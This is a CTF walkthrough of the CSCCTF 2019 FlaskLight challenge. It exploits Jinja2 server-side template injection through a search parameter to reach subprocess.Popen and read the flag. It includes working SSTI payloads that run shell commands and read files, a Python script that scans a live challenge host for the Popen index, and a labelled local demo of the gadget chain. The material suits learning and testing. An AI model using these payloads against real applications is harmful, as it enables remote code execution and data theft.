CSCCTF 2019 QualFlaskLight

Looking at the source: the search form submits via GET, and the page echoes whatever was searched back into the response.

(screenshot: 159.PNG)

(screenshot: 160.PNG)

So the input reaches the template through the ?search parameter.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
The page above covers SSTI (server-side template injection) payloads for the common engines.
First, probe which template engine is in use (e.g. {{7*7}} and {{7*'7'}} behave differently across engines).

(screenshot: 161.PNG)

It is Jinja2 (Flask's default template engine), so the Jinja2 payloads apply.

?search={{ ''.__class__.__mro__[2].__subclasses__() }}

This walks from the empty string to its class, then up the MRO to object, and dumps every loaded direct subclass of object. The hard-coded [2] only works because the target runs Python 2, where str's MRO is (str, basestring, object); on Python 3 the MRO is (str, object), so use [1] or, portably, [-1].

(screenshot: 162.PNG)

Next, find a usable class. The subclass list is long and its order depends on what the target process has imported, so the index of subprocess.Popen has to be looked up rather than guessed. The script below requests one index at a time and stops when the echoed class repr mentions subprocess.Popen (the range starts at 170 because the earlier dump showed nothing useful before that):

```python
import html
import re
import time

import requests

# Challenge instance; the payload is rendered by the page and echoed back.
BASE = "http://02e2317d-6141-483a-916e-7c9efd4d571d.node4.buuoj.cn:81/"
PAYLOAD = "{{''.__class__.__mro__[2].__subclasses__()[%d]}}"
# The response shows the rendered template as: <h2>You searched for:</h2> <h3>...</h3>
PATTERN = re.compile(r"<h2>You searched for:</h2>\W+<h3>(.*)</h3>")

index = 0
for i in range(170, 1000):
    try:
        r = requests.get(BASE, params={"search": PAYLOAD % i})
        res = PATTERN.findall(r.text)
        time.sleep(0.1)  # be gentle with the shared instance
        # The class repr comes back HTML-escaped, e.g. &lt;class 'subprocess.Popen'&gt;
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except (IndexError, requests.RequestException):
        # IndexError: no <h3> match (index out of range raises a template error)
        continue
print("index of subprocess.Popen: " + str(index))
```
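The following is an added example, not part of the original writeup or the challenge code. It performs the same gadget walk locally, in the current interpreter, so you can see why the Popen index must be scanned rather than hard-coded, why `[-1]` is the portable way to reach object, and how the `(cmd, stdout=-1).communicate()[0].strip()` chain used in the payloads below actually produces output (stdout=-1 is subprocess.PIPE). The function names and the `echo ssti` sample command are this example's own choices.

```python
import subprocess  # ensures subprocess.Popen is a loaded subclass of object


def object_type():
    """Reach <class 'object'> from a str instance the way the SSTI payload does.
    [-1] works on both Python 2 (str, basestring, object) and Python 3 (str, object);
    the writeup's hard-coded [2] is Python 2 only."""
    return "".__class__.__mro__[-1]


def find_gadget(qualified_name):
    """Return (index, class) of the first direct subclass of object whose
    module.name matches `qualified_name`, or (None, None) if it is not loaded.
    The index varies between interpreters and import sets, which is exactly
    why the scanner above probes one index at a time."""
    for i, cls in enumerate(object_type().__subclasses__()):
        if "%s.%s" % (cls.__module__, cls.__name__) == qualified_name:
            return i, cls
    return None, None


def run_via_gadget(argv):
    """Execute `argv` through the Popen class reached via the gadget chain,
    mirroring '...[idx](cmd, stdout=-1).communicate()[0].strip()'.
    stdout=-1 is subprocess.PIPE; argv is a list, so no shell is involved here,
    unlike the payloads below which pass shell=True to run a command string."""
    _, popen = find_gadget("subprocess.Popen")
    if popen is None:
        raise RuntimeError("subprocess.Popen is not loaded in this interpreter")
    return popen(argv, stdout=-1).communicate()[0].strip()


if __name__ == "__main__":
    idx, cls = find_gadget("subprocess.Popen")
    print("subprocess.Popen is object.__subclasses__()[%d]: %r" % (idx, cls))
    print(run_via_gadget(["echo", "ssti"]))
```

Run it under two different Python builds (or with an extra module imported first) and the printed index changes while the technique still works; that instability is why the writeup's index 258 is specific to this target.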
On this instance subprocess.Popen was at index 258. With that, commands can be run through the template: stdout=-1 is subprocess.PIPE, and communicate()[0] returns the captured output.

```
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
```

The flag can also be read without spawning a process. The payload below starts from an arbitrary value in Flask's config object (config.items()[4][1] is indexable only because dict.items() returns a list on Python 2), climbs its MRO to object, and uses the class at index 40, which on this target is Python 2's built-in file type:

```
?search={{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/flasklight/coomme_geeeett_youur_flek").read() }}
```